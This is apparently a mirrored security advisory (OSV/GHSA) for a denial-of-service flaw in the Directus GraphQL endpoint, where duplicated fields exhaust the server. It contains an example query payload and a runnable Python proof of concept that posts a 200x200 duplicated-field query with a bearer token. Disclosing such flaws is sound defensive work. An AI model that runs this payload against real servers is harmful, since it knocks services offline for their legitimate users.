Lucene search

K
osvGoogleOSV:GHSA-7HMH-PFRP-VCX4
HistoryJul 08, 2024 - 6:41 p.m.

Directus GraphQL Field Duplication Denial of Service (DoS)

2024-07-0818:41:00
Google
osv.dev
10
directus
graphql
field duplication
denial of service
attack
server
redundant computations
excessive resources
vulnerability
unresponsive service

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

AI Score

7

Confidence

High

EPSS

0

Percentile

9.2%

Summary

A denial of service (DoS) attack by field duplication in GraphQL is a type of attack where an attacker exploits the flexibility of GraphQL to overwhelm a server by requesting the same field multiple times in a single query. This can cause the server to perform redundant computations and consume excessive resources, leading to a denial of service for legitimate users.

Details

Request to the endpoint /graphql are sent when visualizing graphs generated at a dashboard:
image

DoS5

By modifying the data sent and duplicating many times the fields a DoS attack is possible.

PoC

The goal is to create a payload that generates a body like this, where the ‘max’ field is duplicated many times, each with the ‘id’ field duplicated many times inside it.
{'query': 'query { query_4f4722ea: test_table_aggregated { max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } } }'}

Although that payload seems harmless, a bigger one leaves the service unresponsive.

The following code might serve as a PoC written in Python3:

# GitHub @asantof

import requests

## CHANGE THIS VALUES: url, auth_token, query_name, collection_name
url = 'http://0.0.0.0:8055/graphql'
auth_token = '' 
query_name = 'query_XXXXX' 
collection_name = ''  

headers = {
    'Content-Type': 'application/json',
    'Authorization': f'Bearer {auth_token}',
}

id_payload = 'id ' * 200
max_payload = 'max {' + id_payload + ' } '
full_payload = max_payload * 200

data = {
    'query': 'query { ' + query_name + ': ' + collection_name + '_aggregated { ' + full_payload + ' } }'
}

print(data)

response = requests.post(url, headers=headers, json=data)

print(response.json())

DoS4

After running it the service will be unresponsive for a while:
DoS

Impact

The vulnerability impacts the service’s availability by causing it to become unresponsive for a few minutes. An attacker could continuously send this request to the server, rendering the service unavailable indefinitely.

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

AI Score

7

Confidence

High

EPSS

0

Percentile

9.2%

Related for OSV:GHSA-7HMH-PFRP-VCX4